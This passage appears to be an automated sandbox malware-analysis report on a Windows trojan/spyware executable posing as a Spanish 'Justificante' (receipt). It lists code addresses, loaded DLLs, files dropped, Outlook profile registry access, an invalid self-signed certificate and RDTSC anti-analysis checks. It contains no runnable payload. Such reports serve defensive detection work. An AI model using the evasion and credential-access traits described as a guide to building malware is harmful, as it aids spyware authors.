            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3609345F4_2_3609345F
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_360934604_2_36093460
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_360964784_2_36096478
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_360964884_2_36096488
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3609048F4_2_3609048F
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_360904984_2_36090498
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_360938A84_2_360938A8
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3609E0A74_2_3609E0A7
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3609E0B84_2_3609E0B8
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_360938B84_2_360938B8
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3609C0B74_2_3609C0B7
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3609C0C84_2_3609C0C8
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_360908E74_2_360908E7
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_360908F04_2_360908F0
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3609A9284_2_3609A928
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3609A9384_2_3609A938
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3609E5384_2_3609E538
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36090D484_2_36090D48
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3609E5484_2_3609E548
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3609C5484_2_3609C548
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3609C5584_2_3609C558
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_360911A04_2_360911A0
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3609E9C84_2_3609E9C8
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_360981C04_2_360981C0
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3609E9D84_2_3609E9D8
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3609C9D84_2_3609C9D8
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3609C9E84_2_3609C9E8
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_360915EF4_2_360915EF
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_360915F84_2_360915F8
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361017104_2_36101710
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361066784_2_36106678
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36109B104_2_36109B10
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361000124_2_36100012
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361029184_2_36102918
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3610C6184_2_3610C618
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361052194_2_36105219
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361083194_2_36108319
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3610F1194_2_3610F119
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3610AE1F4_2_3610AE1F
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3610DE004_2_3610DE00
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361029074_2_36102907
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361049084_2_36104908
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361070084_2_36107008
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3610C6084_2_3610C608
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361066094_2_36106609
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3610AE304_2_3610AE30
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36106B304_2_36106B30
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361096374_2_36109637
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361032384_2_36103238
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3610D9384_2_3610D938
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36105B394_2_36105B39
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3610F1204_2_3610F120
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3610D9274_2_3610D927
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361052284_2_36105228
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361083284_2_36108328
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3610322F4_2_3610322F
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3610C1504_2_3610C150
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361009504_2_36100950
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36107E504_2_36107E50
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36103B584_2_36103B58
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3610EC584_2_3610EC58
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3610A9584_2_3610A958
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361000404_2_36100040
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36106B404_2_36106B40
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3610C1434_2_3610C143
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36105B484_2_36105B48
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361096484_2_36109648
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3610EC4D4_2_3610EC4D
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36103B4F4_2_36103B4F
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3610D4704_2_3610D470
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361012704_2_36101270
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361091714_2_36109171
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361066754_2_36106675
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361044784_2_36104478
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361024784_2_36102478
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3610BC784_2_3610BC78
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3610E77F4_2_3610E77F
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361009604_2_36100960
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36107E604_2_36107E60
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3610D4604_2_3610D460
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3610A9684_2_3610A968
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361044684_2_36104468
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3610E7904_2_3610E790
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36101B914_2_36101B91
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36104D984_2_36104D98
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361079984_2_36107998
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36102D9B4_2_36102D9B
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361012804_2_36101280
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361091804_2_36109180
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361024884_2_36102488
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3610BC884_2_3610BC88
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361079884_2_36107988
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36104D894_2_36104D89
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3610A48F4_2_3610A48F
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3610FAB04_2_3610FAB0
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3610B7B34_2_3610B7B3
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361056B84_2_361056B8
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36108CB84_2_36108CB8
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3610E2B84_2_3610E2B8
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361074BF4_2_361074BF
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36101BA04_2_36101BA0
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3610A4A04_2_3610A4A0
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3610CFA64_2_3610CFA6
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36102DA84_2_36102DA8
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3610CFA84_2_3610CFA8
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361056A84_2_361056A8
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_36108CA94_2_36108CA9
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3610FAAB4_2_3610FAAB
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361004D04_2_361004D0
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_361074D04_2_361074D0
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeCode function: 4_2_3610CAD14_2_3610CAD1
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe Code function: String function: 00402BCE appears 50 times
            Source: Justificante67ab404ffe31b359e00a499e656454545.exe Static PE information: invalid certificate
            Source: Justificante67ab404ffe31b359e00a499e656454545.exe, 00000004.00000002.2954495330.0000000032C67000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: OriginalFilenameUNKNOWN_FILET vs Justificante67ab404ffe31b359e00a499e656454545.exe
            Source: Justificante67ab404ffe31b359e00a499e656454545.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@3/14@5/5
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe Code function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_00403348
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe Code function: 4_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 4_2_00403348
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe Code function: 0_2_0040460D GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA, 0_2_0040460D
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe Code function: 0_2_0040216B CoCreateInstance,MultiByteToWideChar, 0_2_0040216B
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe File created: C:\Program Files (x86)\Hypotesers
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\dogging
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe Mutant created: NULL
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe File created: C:\Users\user\AppData\Local\Temp\nsn1557.tmp
            Source: Justificante67ab404ffe31b359e00a499e656454545.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe File read: C:\Users\desktop.ini
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: Justificante67ab404ffe31b359e00a499e656454545.exe Virustotal: Detection: 29%
            Source: Justificante67ab404ffe31b359e00a499e656454545.exe ReversingLabs: Detection: 62%
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe File read: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe
            Source: unknown Process created: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe "C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe"
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe Process created: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe "C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe"
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe Section loaded: propsys.dll
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe Section loaded: dwmapi.dll
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe Section loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe Section loaded: oleacc.dll
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe Section loaded: ntmarta.dll
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe Section loaded: version.dll
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe Section loaded: shfolder.dll
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe Section loaded: profapi.dll
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe Section loaded: wininet.dll
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe Section loaded: iertutil.dll
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe Section loaded: sspicli.dll
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe Section loaded: profapi.dll
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe Section loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe Section loaded: winhttp.dll
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe Section loaded: iphlpapi.dll
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe Section loaded: mswsock.dll
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe Section loaded: winnsi.dll
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe Section loaded: urlmon.dll
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe Section loaded: srvcli.dll
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe Section loaded: netutils.dll
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe Section loaded: dnsapi.dll
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe Section loaded: rasadhlp.dll
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe Section loaded: fwpuclnt.dll
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe Section loaded: schannel.dll
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe Section loaded: mskeyprotect.dll
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe Section loaded: ntasn1.dll
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe Section loaded: msasn1.dll
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe Section loaded: dpapi.dll
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe Section loaded: cryptsp.dll
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe Section loaded: rsaenh.dll
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe Section loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe Section loaded: gpapi.dll
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe Section loaded: ncrypt.dll
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe Section loaded: ncryptsslp.dll
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe Section loaded: mscoree.dll
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe Section loaded: version.dll
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe Section loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe Section loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe Section loaded: rasapi32.dll
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe Section loaded: rasman.dll
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe Section loaded: rtutils.dll
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe Section loaded: dhcpcsvc6.dll
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe Section loaded: dhcpcsvc.dll
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe Section loaded: secur32.dll
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe File written: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\dogging\Tvejrs.ini
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
            Source: Justificante67ab404ffe31b359e00a499e656454545.exe Static file information: File size 1180672 > 1048576
            Source: Justificante67ab404ffe31b359e00a499e656454545.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Data Obfuscation

            Source: Yara match File source: 00000000.00000002.2049807822.00000000028B7000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe Code function: 0_2_6FC41A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA, 0_2_6FC41A98
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe Code function: 0_2_6FC42F60 push eax; ret 0_2_6FC42F8E
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe Code function: 4_2_02559C30 push esp; retf 0260h 4_2_02559D55
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe Code function: 4_2_367F349B push ss; retf 4_2_367F34AE

            Persistence and Installation Behavior

            Source: Initial sample Joe Sandbox AI: Detected suspicious elements in PE signature: Multiple highly suspicious indicators: 1) Self-signed certificate where issuer matches subject exactly 2) Organization 'Fejlbehandlingen' is not a known legitimate company 3) Email domain 'Efterhngtes.Dse' appears to be suspicious/non-standard 4) Certificate validation explicitly fails with untrusted root certificate 5) Large time gap between compilation date (July 2021) and certificate creation (Nov 2024) suggests potential certificate manipulation 6) While the country is Germany (DE) which is generally trusted, the combination of an unknown organization with invalid certificate signature is very concerning. The certificate appears crafted to look legitimate but fails basic trust validation.
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe File created: C:\Users\user\AppData\Local\Temp\nsd1568.tmp\System.dll
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exe Process information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeAPI/Special instruction interceptor: Address: 2DE681D
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeAPI/Special instruction interceptor: Address: 1D9681D
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeRDTSC instruction interceptor: First address: 2DBEFB2 second address: 2DBEFB2 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007FF2DCDB99F8h 0x00000006 inc ebp 0x00000007 test bl, dl 0x00000009 inc ebx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeRDTSC instruction interceptor: First address: 1D6EFB2 second address: 1D6EFB2 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007FF2DCFB3538h 0x00000006 inc ebp 0x00000007 test bl, dl 0x00000009 inc ebx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeMemory allocated: 2550000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeMemory allocated: 32D90000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeMemory allocated: 32A80000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeThread delayed: delay time: 599875Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeThread delayed: delay time: 599766Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeThread delayed: delay time: 599657Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeThread delayed: delay time: 599532Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeThread delayed: delay time: 599422Jump to behavior
            Source: C:\Users\user\Desktop\Justificante67ab404ffe31b359e00a499e656454545.exeThread delayed: delay time: 599313Jump to behavior
